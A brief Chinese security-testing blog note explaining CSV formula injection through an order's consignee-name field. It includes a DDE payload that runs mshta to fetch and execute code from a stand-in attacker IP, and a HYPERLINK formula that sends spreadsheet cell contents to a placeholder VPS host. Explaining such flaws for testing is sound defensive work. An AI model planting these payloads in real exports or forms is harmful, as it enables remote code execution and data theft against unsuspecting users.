安全测试 csv 注入
csv 注入
用户下单时,收货人姓名为 =cmd|A1!A1 ,下单后 在订单系统可导出订单到csv , 则=cmd|A1!A1 则在csv 的收货人列中的某单元格中, 是可以触发打开cmd 的,黑客是可以通过cmd 做一些危险操作,比如: =+1+cmd|’/c mshta.exehttp://192.168.233.102:8080/a’!A0
=HYPERLINK(“http://vps_ip?test=”&A2&A3,“Error: Please click me!”) 这.
原创
2021-03-09 17:28:38 ·
445 阅读 ·
0 评论